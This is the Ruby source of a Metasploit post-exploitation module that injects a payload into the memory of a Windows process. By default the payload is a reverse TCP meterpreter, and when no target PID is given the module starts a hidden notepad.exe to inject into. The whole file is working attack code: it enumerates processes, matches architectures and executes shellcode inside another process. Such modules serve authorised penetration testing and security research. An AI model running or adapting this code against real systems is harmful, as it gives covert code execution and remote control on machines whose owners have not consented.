##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Windows::Process

  def initialize(info={})
    super( update_info( info,
      'Name'            => 'Windows Manage Memory Payload Injection',
      'Description'     => %q{
          This module will inject a payload into memory of a process.  If a payload
        isn't selected, then it'll default to a reverse x86 TCP meterpreter.  If the PID
        datastore option isn't specified, then it'll inject into notepad.exe instead.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Carlos Perez <carlos_perez[at]darkoperator.com>',
          'sinn3r'
        ],
      'Platform'        => [ 'win' ],
      'Arch'            => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'    => [ 'meterpreter' ],
      'Targets'         => [ [ 'Windows', {} ] ],
      'DefaultTarget'   => 0,
      'DisclosureDate'  => "Oct 12 2011"
    ))

    register_options(
      [
        OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']),
        OptBool.new('NEWPROCESS', [false, 'New notepad.exe to inject to', false])
      ])
  end

  # Run Method for when run command is issued
  def exploit
    @payload_name = datastore['PAYLOAD']
    @payload_arch = framework.payloads.create(@payload_name).arch

    # syinfo is only on meterpreter sessions
    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?

    pid = get_pid
    if not pid
      print_error("Unable to get a proper PID")
      return
    end

    inject_into_pid(pid)
  end

  # Figures out which PID to inject to
  def get_pid
    pid = datastore['PID']
    if pid == 0 or datastore['NEWPROCESS'] or not has_pid?(pid)
      print_status("Launching notepad.exe...")
      pid = create_temp_proc
    end

    return pid
  end


  # Determines if a PID actually exists
  def has_pid?(pid)
    procs = []
    begin
      procs = client.sys.process.processes
    rescue Rex::Post::Meterpreter::RequestError
      print_error("Unable to enumerate processes")
      return false
    end

    procs.each do |p|
      found_pid = p['pid']
      return true if found_pid == pid
    end

    print_error("PID #{pid.to_s} does not actually exist.")

    return false
  end

  # Checks the Architeture of a Payload and PID are compatible
  # Returns true if they are false if they are not
  def arch_check(pid)
    # get the pid arch
    client.sys.process.processes.each do |p|
      # Check Payload Arch
      if pid == p["pid"]
        vprint_status("Process found checking Architecture")
        if @payload_arch.first == p['arch']
          vprint_good("Process is the same architecture as the payload")
          return true
        else
          print_error("The PID #{ p['arch']} and Payload #{@payload_arch.first} architectures are different.")
          return false
        end
      end
    end
  end

  # Creates a temp notepad.exe to inject payload in to given the payload
  # Returns process PID
  def create_temp_proc()
    windir = client.sys.config.getenv('windir')
    # Select path of executable to run depending the architecture
    if @payload_arch.first== ARCH_X86 and client.arch == ARCH_X86
      cmd = "#{windir}\\System32\\notepad.exe"
    elsif @payload_arch.first == ARCH_X64 and client.arch == ARCH_X64
      cmd = "#{windir}\\System32\\notepad.exe"
    elsif @payload_arch.first == ARCH_X64 and client.arch == ARCH_X86
      cmd = "#{windir}\\Sysnative\\notepad.exe"
    elsif @payload_arch.first == ARCH_X86 and client.arch == ARCH_X64
      cmd = "#{windir}\\SysWOW64\\notepad.exe"
    end

    begin
      proc = client.sys.process.execute(cmd, nil, {'Hidden' => true})
    rescue Rex::Post::Meterpreter::RequestError
      return nil
    end

    return proc.pid
  end

  def inject_into_pid(pid)
    vprint_status("Performing Architecture Check")
    return if not arch_check(pid)

    begin
      print_status("Preparing '#{@payload_name}' for PID #{pid}")
      raw = payload.encoded
      execute_shellcode(raw, nil, pid)
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error("Unable to inject payload:")
      print_line(e.to_s)
    end
  end
end
